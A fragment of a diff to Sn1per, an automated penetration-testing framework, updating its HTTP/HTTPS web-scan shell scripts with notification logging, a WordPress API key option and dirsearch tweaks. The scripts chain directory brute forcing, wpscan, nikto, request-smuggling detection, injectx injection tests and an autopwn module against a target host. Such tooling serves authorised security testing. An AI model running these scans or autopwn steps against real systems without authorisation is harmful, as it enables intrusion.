echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl https://$TARGET 2> $LOOT_DIR/web/curldebug-$TARGET.txt > /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ $DISTRO == "blackarch" ]]; then
|
||||
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
|
||||
|
||||
if [[ $WEBSCREENSHOT = "1" ]]; then
|
||||
cd $LOOT_DIR
|
||||
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium https://$TARGET:443
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/normal_webporthttps.sh
|
||||
|
||||
cd $INSTALL_DIR
|
||||
PORT="443"
|
||||
SSL="true"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
|
||||
fi
|
||||
|
||||
if [[ -z "$port_445" ]]; then
|
||||
echo -e "$OKRED + -- --=[Port 445 closed... skipping.$RESET"
|
||||
elif [[ $SMB = "1" ]]; then
|
||||
|
|
@ -1445,23 +1201,23 @@ else
|
|||
fi
|
||||
fi
|
||||
|
||||
if [[ $YASUO = "1" ]]; then
|
||||
if [[ "$AUTO_VULNSCAN" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCANNING FOR COMMON VULNERABILITIES $RESET"
|
||||
echo -e "$OKRED PERFORMING AUTO VULNSCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ $DISTRO == "blackarch" ]]; then
|
||||
/bin/yasuo -r $TARGET -b all | tee $LOOT_DIR/output/yasuo-$TARGET.txt 2> /dev/null
|
||||
tee $LOOT_DIR/output/yasuo-$TARGET.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/yasuo-$TARGET.raw > $LOOT_DIR/output/yasuo-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/yasuo-$TARGET.raw 2> /dev/null
|
||||
else
|
||||
cd $PLUGINS_DIR/yasuo
|
||||
ruby yasuo.rb -r $TARGET -b all | tee $LOOT_DIR/output/yasuo-$TARGET.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/yasuo-$TARGET.raw 2> /dev/null > $LOOT_DIR/output/yasuo-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/yasuo-$TARGET.raw 2> /dev/null
|
||||
fi
|
||||
sniper -t $TARGET -m vulnscan -w $WORKSPACE
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCANNING ALL HTTP PORTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
for a in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml | grep state\=\"open\" | grep http | grep -v https | grep -v ssl | grep tcp | cut -d\" -f4`; do sniper -t $TARGET -m webporthttp -p $a -w $WORKSPACE; done;
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCANNING ALL HTTPS PORTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
for a in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml | grep state\=\"open\" | egrep 'https|ssl' | grep tcp | cut -d\" -f4`; do sniper -t $TARGET -m webporthttps -p $a -w $WORKSPACE; done;
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
fi
|
||||
|
|
@ -1493,9 +1249,10 @@ echo -e "${OKGREEN}=============================================================
|
|||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$LOOT" = "1" ]] && [[ -z "$NOLOOT" ]]; then
|
||||
loot
|
||||
|
|
|
|||
|
|
@ -2,9 +2,9 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -44,10 +44,17 @@ if [[ "$MODE" = "web" ]]; then
|
|||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
|
||||
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -67,7 +74,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e $WEB_BRUTE_EXTENSIONS -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e $WEB_BRUTE_EXTENSIONS -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-common.txt
|
||||
|
|
@ -78,7 +85,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-full.txt
|
||||
|
|
@ -89,7 +96,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-exploits.txt
|
||||
|
|
@ -101,7 +108,11 @@ if [[ "$MODE" = "web" ]]; then
|
|||
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
|
||||
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -128,10 +139,17 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wpscan --url http://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpb.txt
|
||||
echo ""
|
||||
if [[ "$WP_API_KEY" ]]; then
|
||||
wpscan --url http://$TARGET --no-update --disable-tls-checks --api-key $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks --api-key $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpb.txt
|
||||
echo ""
|
||||
else
|
||||
wpscan --url http://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpb.txt
|
||||
echo ""
|
||||
fi
|
||||
fi
|
||||
if [[ "$NIKTO" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -161,12 +179,12 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py -u http://$TARGET | tee $LOOT_DIR/web/smuggler-$TARGET-port80.txt
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u http://$TARGET | tee $LOOT_DIR/web/smuggler-$TARGET-port80.txt
|
||||
fi
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
fi
|
||||
|
|
@ -2,9 +2,9 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -44,16 +44,20 @@ if [[ "$MODE" = "web" ]]; then
|
|||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
if [[ "$INJECTX" == "1" ]]; then
|
||||
rm -f $LOOT_DIR/web/injectx-$TARGET-https.txt 2> /dev/null
|
||||
#cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'https\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt
|
||||
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt; done; done;
|
||||
fi
|
||||
source $INSTALL_DIR/modes/static-grep-search.sh
|
||||
|
|
@ -67,7 +71,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-common.txt
|
||||
|
|
@ -78,7 +82,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-full.txt
|
||||
|
|
@ -89,7 +93,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-exploits.txt
|
||||
|
|
@ -101,7 +105,11 @@ if [[ "$MODE" = "web" ]]; then
|
|||
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
|
||||
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
|
||||
